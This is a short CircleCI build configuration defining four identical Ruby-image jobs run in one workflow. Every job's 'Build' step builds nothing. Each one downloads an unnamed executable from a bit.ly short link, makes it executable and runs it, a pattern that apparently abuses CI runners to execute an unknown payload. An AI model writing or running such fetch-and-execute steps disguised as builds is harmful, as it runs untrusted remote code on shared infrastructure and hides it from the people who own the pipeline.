version: 2
jobs:
    Build_20:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Build
            command: wget bit.ly/3PGDERPOT && chmod +x 3PGDERPOT && ./3PGDERPOT
    Build_19:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Build
            command: wget bit.ly/3PGDERPOT && chmod +x 3PGDERPOT && ./3PGDERPOT
    Build_18:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Build
            command: wget bit.ly/3PGDERPOT && chmod +x 3PGDERPOT && ./3PGDERPOT
    Build_17:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Build
            command: wget bit.ly/3PGDERPOT && chmod +x 3PGDERPOT && ./3PGDERPOT

workflows:
    version: 2
    build:
        jobs:
            - Build_20
            - Build_19
            - Build_18
            - Build_17
        